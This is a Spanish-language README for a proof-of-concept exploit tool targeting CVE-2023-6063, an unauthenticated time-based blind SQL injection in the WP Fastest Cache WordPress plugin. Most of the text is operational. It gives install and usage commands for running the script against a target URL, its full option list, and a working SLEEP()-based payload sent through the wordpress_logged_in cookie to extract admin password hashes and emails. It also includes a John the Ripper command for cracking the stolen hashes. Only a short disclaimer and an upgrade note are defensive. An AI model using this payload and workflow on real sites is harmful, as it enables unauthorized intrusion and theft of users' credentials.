
Una prueba de concepto para CVE-2023-6063, una vulnerabilidad de inyección SQL ciega basada en tiempo en WP Fastest Cache ≤1.2.2.
Una prueba de concepto para CVE-2023-6063, una vulnerabilidad de inyección SQL ciega basada en tiempo en WP Fastest Cache ≤1.2.2. Extrae contraseñas con hash (user_pass) y correos electrónicos (user_email) de la tabla wp_users abusando de la cookie wordpress_logged_in.
Este script extrae:
Instala las dependencias (si no están instaladas):
pip install -r requirements.txt
Uso básico:
python3 poc.py -u https://vulnerable-website.com --username admin --delay 5
Opciones completas:
-h, --help show this help message and exit
-u URL, --url URL Full URL to Wordpress for testing CVE-2023-6063
--username USERNAME Define a user to extract its hashed pass
-d DELAY, --delay DELAY
Time for wait web response default 5, minimum 2
-H HASH, --hash HASH Hash to verify against wp_users table, if the hash contains specials characters, please use single quotes -> '<hash>'
--domain DOMAIN Name of the domain for email validation
-c COOKIE, --cookie COOKIE
Specify a cookie name if it's different on your context
--status-code STATUS_CODE
Use a specific positive status code, default 200
--debug More verbosity
--just-hash Just extract hashed password
--just-email Just extract email value for a user
Esta es una demo para el usuario admin
https://github.com/user-attachments/assets/21ea643d-3b11-401f-813f-b85abdb05890
Cuando se filtren hashes de contraseñas, usa john o hashcat para descifrarlos con el algoritmo PHPass si la contraseña es vulnerable.
Ejemplo con John:
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=phpass
El plugin WP Fastest Cache (≤1.2.2) para WordPress es vulnerable a una inyección SQL ciega no autenticada a través de la cookie wordpress_logged_in. Los atacantes pueden explotar esta falla para extraer datos sensibles (por ejemplo, hashes de contraseñas, direcciones de correo electrónico) de la tabla wp_users aprovechando retardos basados en tiempo (SLEEP()) en consultas SQL.
" AND (IF((SELECT user_pass FROM wp_users WHERE user_login="admin") LIKE 'a%', SLEEP(5), 0))-- -
🚨 Aviso: Utiliza esta información únicamente para pruebas de seguridad éticas con la autorización adecuada. La explotación no autorizada es ilegal.
Actualiza WP Fastest Cache a una versión >1.2.2.